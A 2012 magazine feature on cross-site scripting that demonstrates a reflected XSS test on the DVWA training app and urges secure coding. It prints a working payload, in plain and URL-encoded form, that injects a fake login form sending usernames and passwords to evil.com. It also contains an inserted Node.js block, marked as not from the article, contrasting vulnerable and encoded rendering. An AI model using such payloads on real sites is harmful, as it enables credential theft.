FEATURE

Caught in the cross-site scripting fire

Andrew Mason, RandomStorm

Programming is back on the curriculum. The goal of the Raspberry Pi Foundation is to promote computing education by taking children back to the basics of programming computers and to “foster a renaissance in coding”, in the words of Raspberry Pi Foundation’s director, Eben Upton.1,2 To facilitate this, the Foundation has developed a fully functioning computer that retails for just $25. While this drive to get programming onto the national curriculum is laudable, as penetration testers will tell you, one of the issues they frequently encounter is the gap between the ability to program and the knowledge of how to program securely. This article will examine some of the techniques used by security researchers to test common web platforms for vulnerabilities that could be exploited by malicious hackers and cyber-criminals. Many web application vulnerabilities can be searched for automatically using underground hacking tools. For the purposes of this article, we will be using the Damned Vulnerable Web App (DVWA) tool, developed by security researcher and ethical hacker Ryan Dewhurst to provide a legal platform for teaching developers and security researchers about common vulnerabilities. We will then provide a fictitious example of a common vulnerability, to demonstrate how slipshod application development can put businesses and their customers at risk of privacy breaches, identity theft and fraud.

“As the web is the main vector for attacks on company databases and intellectual property, this is a good time to reassess the importance of secure web application development”

This is an important issue for all organisations. Proposed changes to European data protection laws call for disclosure of an information security breach within 24 hours and the introduction of fines amounting to 2% of an organisation’s global turnover if customer databases are compromised.3,4 As the web is the main vector for attacks on company databases and intellectual property, this is a good time to reassess the importance of secure web application development.

Using the DVWA

The DVWA is a free PHP/MySQL web application that contains many of the common vulnerabilities that hackers and cyber-criminals seek to exploit.5 It was developed by Dewhurst to provide a way of teaching application developers about the common programming mistakes that allow malicious code to be inserted into strings, making the application unsafe for users. DVWA also serves as a training tool for security professionals, to help them hone their penetration testing skills in a legal environment. The web app can also be used in classrooms as part of a computer science and cybersecurity course to show students how to test for Cross-Site Scripting (XSS), file inclusion, SQL injection, brute force attacks or file upload vulnerabilities within web applications. As its name suggests, DVWA is indeed ‘damned vulnerable’ and it should therefore never be uploaded to a live web server, as it will be hacked. It’s recommended that you download and install XAMPP – a distribution of the Apache web server that also includes MySQL, PHP, Perl and a number of other libraries and tools – onto a local machine and that the DVWA is only ever run on a test machine on your local area network.6 Further details on downloading and running the DVWA tool can be read on the DVWA wiki and Dewhurst has also created an installation video.7,8

Figure 1: The input field that is going to be attacked.

Figure 2: Innocent input entered to see how it is subsequently used.

Figure 3: The HTML of the resulting page.

Exploiting XSS

The Open Web Application Security Project (OWASP) is a not-for-profit organisation set up to improve the security of applications.9 OWASP has acknowledged that XSS is the most common security flaw found in websites today. This has been borne out in vulnerability testing by penetration testers who also take part in voluntary disclosure programmes to help improve the security of public web platforms.

Figure 4: Injecting HTML into the input. The text is returned in bold showing that injection has worked.

“A recent survey found that 90% of webmasters were not aware that their sites had been compromised”

It is important to remove XSS vulnerabilities from websites, because they can be maliciously exploited to steal cookies, hijack user accounts, execute ActiveX and Flash content, or to redirect visitors to scam websites that launch phishing attacks. Examples of organisations’ websites that have been compromised using these methods include the BBC 6 Music and 1Xtra websites, which were used to host a drive-by download attack to infect visitors’ computers with the Phoenix Trojan, and the Sun newspaper website, which was hacked by LulzSec and displayed a false story that Rupert Murdoch had died.10,11 XSS vulnerabilities can also be used to insert malicious code into websites without the owner’s knowledge. A recent survey undertaken by anti-malware vendor Commtouch found that 90% of webmasters were not aware that their sites had been compromised, even though they were being used to send spam, host phishing sites and to execute drive-by download attacks on site visitors.12 Once malware from a compromised website has been executed on a user’s computer, hackers and cyber-criminals can exploit this in a number of ways, such as initiating unauthorised activity on your hard disk and altering, spying on, stealing or deleting your data. And as Commtouch found in its webmaster survey, it is not easy to spot when your site has been compromised.13 Hackers use tactics such as inserting infected iframes, which look like normal pictures on the web page, but which can be used to initiate drive-by downloads of malware to visitors’ computers. This sort of activity can get your site blacklisted, so it’s important to scan for vulnerabilities and remove them.

Figure 5: The HTML showing the injected tags.

However, as we can see from security researchers posting vulnerabilities to the XSSed website, XSS vulnerabilities are still routinely discovered, even on the largest organisations’ websites.14 This indicates that their web developers still do not understand the potential impact on site visitors if their applications and web pages contain an XSS vulnerability.

“The main cause of vulnerabilities on public web platforms is that web developers are paid to create working sites and applications as quickly as possible, but they are not security experts”

The main cause of vulnerabilities on public web platforms is that web developers are paid to create working sites and applications as quickly as possible, but they are not security experts. Therefore, they don’t necessarily know how to follow OWASP best practice when developing web applications, or how to test whether their code is vulnerable to XSS attacks. That’s why the work of voluntary web application testers is so important for improving safety for all web users.

Testing for web application vulnerabilities

Figures 1-8 show a demonstration, carried out by RandomStorm’s senior security engineer Robin Wood, of how to use DVWA to check a web application for an XSS vulnerability. Figure 1 shows the input field we’re going to attack. In Figure 2, we enter some innocent input to see where it is reflected back. In this case we use the word ‘Test’. Figure 3 shows how this looks in the resulting HTML. Now we’re going to see if we can inject some HTML. In Figure 4, we enter Test and see if the message comes back in bold – and it does, proving we have HTML injection. Figure 5 shows the resulting HTML. In Figure 6, we see if we can inject JavaScript with the standard basic attack code. If this works we will see a popup box containing the message XSS – and indeed it does work, showing that we can inject JavaScript. Figure 7 again shows the HTML. Most testers stop here, having shown that there’s a code injection vulnerability that could lead to XSS. But to demonstrate the full effect, let’s use JavaScript to rewrite the page to include a login box, rather than the current input field. The JavaScript used here is:

<script>
document.getElementsByTagName('div')[5].innerHTML='<h1>Please Login</h1><form action="http://evil.com">User<input name="username"><br>Password<input type="password" name="password"><br><input type="submit" value="login"></form>';
</script>

In Figure 8, all the input is included in the querystring, so the previous example becomes the following URL:

http://192.168.56.101/vulnerabilities/xss_r/?name=%3Cscript%3Edocument.getElementsByTagName%28%27div%27%29[5].innerHTML%3D%27%3Ch1%3EPlease%20Login%3C/h1%3E%3Cform%20action=%22http://evil.com%22%3EUser%3Cinput%20name=%22username%22%3E%3Cbr%3EPassword%3Cinput%20type=%22password%22%20name=%22password%22%3E%3Cbr%3E%3Cinput%20type=%22submit%22%20value=%22login%22%3E%3C/form%3E%27%3B%3C%2Fscript%3E#

Figure 6: Trying injection again, this time with JavaScript. The pop-up shows it worked.

Figure 7: Viewing the page’s HTML, showing inserted JavaScript.

Figure 8: Using JavaScript to create a login form.

Figure 9: A theoretical attack against a social networking site.

If this vulnerability is present on a site that people trust, they will receive a URL that is for the site they trust. If it is over HTTPS, then it will still be over HTTPS and the padlock and certificate will be intact, as all the content is being served from the hacked site.
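The reflection that the walkthrough above exercises, as an added example that is not code from the article or from DVWA: a Node.js script that pulls the name parameter out of the attack URL quoted above, renders it through a DVWA-style string concatenation and through a version that HTML-encodes the value first, and automates the bold-text check from Figures 4 and 5. The `<pre>Hello ...</pre>` wrapper and the probe string are assumptions.

```javascript
// Added example (not code from the article or from DVWA): a DVWA-style
// "Hello <name>" reflection in its vulnerable form and in a hardened form
// that HTML-encodes the value before concatenation. The <pre>Hello ...</pre>
// wrapper and the probe string are assumptions, not taken from the article.

// The attack URL quoted in the article, rejoined onto one line.
const ATTACK_URL =
  "http://192.168.56.101/vulnerabilities/xss_r/?name=%3Cscript%3E" +
  "document.getElementsByTagName%28%27div%27%29[5].innerHTML%3D%27" +
  "%3Ch1%3EPlease%20Login%3C/h1%3E%3Cform%20action=%22http://evil.com%22%3E" +
  "User%3Cinput%20name=%22username%22%3E%3Cbr%3EPassword%3Cinput%20" +
  "type=%22password%22%20name=%22password%22%3E%3Cbr%3E%3Cinput%20" +
  "type=%22submit%22%20value=%22login%22%3E%3C/form%3E%27%3B%3C%2Fscript%3E#";

// Pull one parameter out of the query string and percent-decode it, which is
// what the server does before the value reaches the page template.
function queryParam(url, key) {
  const query = url.split("#")[0].split("?")[1] || "";
  for (const pair of query.split("&")) {
    const [k, ...rest] = pair.split("=");
    if (decodeURIComponent(k) === key) {
      return decodeURIComponent(rest.join("=").replace(/\+/g, " "));
    }
  }
  return "";
}

// Vulnerable: the decoded parameter is concatenated straight into the HTML,
// so any tags it carries become part of the page (Figures 3 to 7).
function renderVulnerable(name) {
  return "<pre>Hello " + name + "</pre>";
}

// Hardened: encode the characters that can switch HTML context, so the same
// input is shown as text instead of being interpreted as markup.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function htmlEncode(text) {
  return text.replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}
function renderSafe(name) {
  return "<pre>Hello " + htmlEncode(name) + "</pre>";
}

// The article's check from Figures 4 and 5, automated: does a marked-up probe
// come back with its markup intact? True means HTML injection is possible.
function reflectsMarkup(render, probe) {
  return render(probe).includes(probe);
}

const PROBE = "<b>probe</b>"; // constructed probe, not the article's own
const payload = queryParam(ATTACK_URL, "name");
console.log("vulnerable reflects markup:", reflectsMarkup(renderVulnerable, PROBE)); // true
console.log("hardened reflects markup:", reflectsMarkup(renderSafe, PROBE)); // false
console.log("payload still a script tag:", renderSafe(payload).includes("<script>")); // false
```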

Another demonstration

Another simple demonstration of XSS weaknesses has been put together by Avram Marius Gabriel, one of RandomStorm’s web application security researchers. He was responsible for discovering and reporting a security vulnerability on eBay to the online auction website.15 He has also been named among the Twitter White Hats and has been credited for his work in the Microsoft Security Response Centre and the Google Hall of Fame.16,17,18 This demonstration uses an XSS test that a web application security researcher could apply to a popular social networking site, such as Facebook, that has a large number of users. Even if these hacks do not lead to online banking theft or identity fraud, the sheer number of users on such sites can be extremely lucrative for clickjackers and likejackers, who are paid for the number of people redirected to a client’s site or advertisement.20 This theoretical example shows how hackers, once they have discovered an XSS vulnerability, might use it to redirect Facebook users to a fraudulent website run by cyber-criminals. A user would see “Facebook under construction. Click here”. Most web users would be wise enough to see through this ruse and avoid clicking the link. However, for the sake of this example, if visitors were tricked into clicking on the link, they could be taken to a phishing site posing as Facebook. From that URL, hackers can redirect people to their own phishing site and use it to gather passwords, dates of birth and other information that would assist them in perpetrating identity fraud. This is not an easy exploit to perpetrate. However, when combined with social engineering, such as researching people’s interests on Google and Facebook and sending a message, or email, enticing them to click on a link promising a video on their favourite sport or hobby, then this could certainly lead to a hack.

Vulnerabilities created by plug-ins

When it comes to browser security, plug-ins such as Java, Flash, QuickTime and Firefox extensions serve as an important vector for compromising systems because they often operate on systems at a higher privilege level than the browser itself.21 It is easier for hackers to write an exploit for Java, Adobe, Flash or ActiveX because these plug-ins extend the functionality of the browser on the PC, providing an effective backdoor into the system. It is also extremely difficult to sandbox plug-ins without disrupting functionality. As a result, plug-ins provide another popular way for hackers to gain control of websites. Dewhurst has developed an application to assist webmasters: WPScan checks WordPress for plugins that could be used by hackers as a backdoor to a blog or website. As the most popular blogging platform, WordPress is an attractive target for hackers seeking to infect a large user base. For example, early in 2012, M86 Security Labs noticed a large-scale compromise of WordPress 3.2.1 that affected 400 websites by redirecting visitors to the Phoenix exploit kit.22

“It is easier to code than it is to code securely. Even the largest companies rely on voluntary disclosure programmes to identify and close vulnerabilities”

WPScan is a black box tool developed using the Ruby programming language, is available as a free download and was also added to the BackTrack catalogue in September 2011.23,24 BackTrack is an open source operating system that provides security consultants around the world with an array of digital forensics and penetration testing tools that assist them in finding and remedying security flaws in company networks, websites and applications. Tools are grouped into categories, including: vulnerability assessment, stress testing, reverse engineering, forensics and reporting.

Conclusion

As we have attempted to demonstrate in this article, it is easier to code than it is to code securely. Even the largest companies rely on voluntary disclosure programmes to identify and close vulnerabilities in their web-facing applications. There are currently a great many more web application developers than there are security experts. However, through a combination of the work of organisations such as OWASP, improved education of the developer community, voluntary security research and disclosure programmes and greater public awareness of hackers’ tactics, leading to safer online behaviour, one would hope to see a gradual improvement in web security over time. When predicting the future of web security, we could use the analogy of the development of the automobile industry during the past century. As technology enabled faster cars, there were a lot of accidents before the manufacturers and the general public started to understand how to improve road safety. As our public education system embraces programming as a core skill and as more security experts support the educational work of organisations such as OWASP, we hope that this will encourage future developers to put security at the heart of coding, without impeding everyday Internet use.

About the author

Andrew Mason is the co-founder and technical director at RandomStorm (www.randomstorm.com), a provider of security consultancy and vulnerability scanning services to private and public sector organisations. He is a Qualified Security Assessor (QSA) for PCI DSS, a Cisco CCIE, CISSP and CESG CHECK Team Leader and has authored several books on Cisco network and Internet security. RandomStorm is a PCI Approved Scanning Vendor and Qualified Security Assessor as well as a government CHECK scheme-approved company.

References

1. ‘Raspberry Pi: about us’. Raspberry Pi Foundation. Accessed May 2012. www.raspberrypi.org/about.
2. ‘Raspberry Pi $25 Linux Computer Now in Production (Video)’. Interview with Foundation’s director, Eben Upton. Slashdot, 17 Jan 2012. Accessed May 2012. http://hardware.slashdot.org/story/12/01/17/0014220/raspberrypi-25-linux-computer-now-inproduction-video.
3. ‘European Commission proposes a comprehensive reform of the data protection rules’. EU Europa, 25 Jan 2012. Accessed May 2012. http://ec.europa.eu/justice/newsroom/dataprotection/news/120125_en.htm.
4. Pignal, Stanley; Palmer, Maija. ‘New EU privacy rules worry business’. Financial Times, 22 Jan 2012. Accessed May 2012. www.ft.com/cms/s/2/e14f2f3e44f3-11e1-be2b-00144feabdc0.html#axzz1kMtOllOk.
5. Damned Vulnerable Web App. Accessed May 2012. www.dvwa.co.uk.
6. XAMPP. Accessed May 2012. www.apachefriends.org/en/xampp.html.
7. DVWA Wiki. Accessed May 2012. http://code.google.com/p/dvwa/wiki/README.
8. Dewhurst, Ryan. ‘Damned Vulnerable Web App Installation’. YouTube, 25 May 2009. Accessed May 2012. www.youtube.com/watch?v=GzIj07jt8rM.
9. Open Web Application Security Project (OWASP). Accessed May 2012. https://www.owasp.org.
10. Goodin, Dan. ‘Hacked BBC streaming websites serve up malware’. The Register, 15 Feb 2011. Accessed May 2012. www.theregister.co.uk/2011/02/15/bbc_driveby_download/.
11. ‘Lulz Security hackers target Sun website’. BBC News, 19 Jul 2011. Accessed 2012. www.bbc.co.uk/news/uk-14196327.
12. ‘Compromised Websites: An Owner’s Perspective’. Commtouch, Feb 2012. Accessed May 2012. www.commtouch.com/compromisedwebsites-report-2012.
13. ‘Webmasters are often clueless when sites are hacked, survey finds’. Infosecurity, 1 Mar 2012. Accessed May 2012. www.infosecurity-magazine.com/view/24269/webmasters-are-often-clueless-when-sites-are-hackedsurvey-finds/.
14. XSSED. Site listing websites where security researchers have discovered XSS vulnerabilities. Accessed May 2012. www.xssed.com.
15. ‘Responsible Disclosure Acknowledgement’. eBay. Accessed May 2012. http://pages.ebay.com/securitycenter/ResearchersAcknowledgement.html.
16. ‘Security at Twitter’. Twitter White Hats. Accessed May 2012. https://twitter.com/about/security.
17. ‘Security Researcher Acknowledgments for Microsoft Online Services’. Microsoft Security TechCenter. Accessed May 2012. http://technet.microsoft.com/en-us/security/cc308589.
18. Google Security Hall of Fame. Accessed May 2012. www.google.com/about/corporate/company/halloffame.html.
19. Greene, Jay. ‘Facebook and Washington State sue alleged likejackers’. CNET, 26 Jan 2012. Accessed May 2012. http://news.cnet.com/8301-1023_3-5736693093/facebook-and-washington-statesue-alleged-likejackers/.
20. Chechick, Daniel. ‘Massive compromise of WordPress-based sites’. M86 Security Labs blog, 30 Jan 2012. Accessed May 2012. http://labs.m86security.com/2012/01/massive-compromiseof-wordpress-based-sites-but%E2%80%98everything-will-befine%E2%80%99/.
21. Bradbury, Danny. ‘The battle of the Internet browsers’. Infosecurity, 27 May 2010. Accessed May 2012. www.infosecurity-magazine.com/view/9761/the-battle-of-the-Internetbrowsers/.
22. Dewhurst, Ryan. Ethicalhack3r blog. Accessed May 2012. http://www.ethicalhack3r.co.uk.
23. BackTrack website. Accessed May 2012. www.backtrack-linux.org.
24. ‘Information for Security Researchers’. Facebook, responsible disclosure policy and list of researchers. Accessed May 2012. www.facebook.com/whitehat.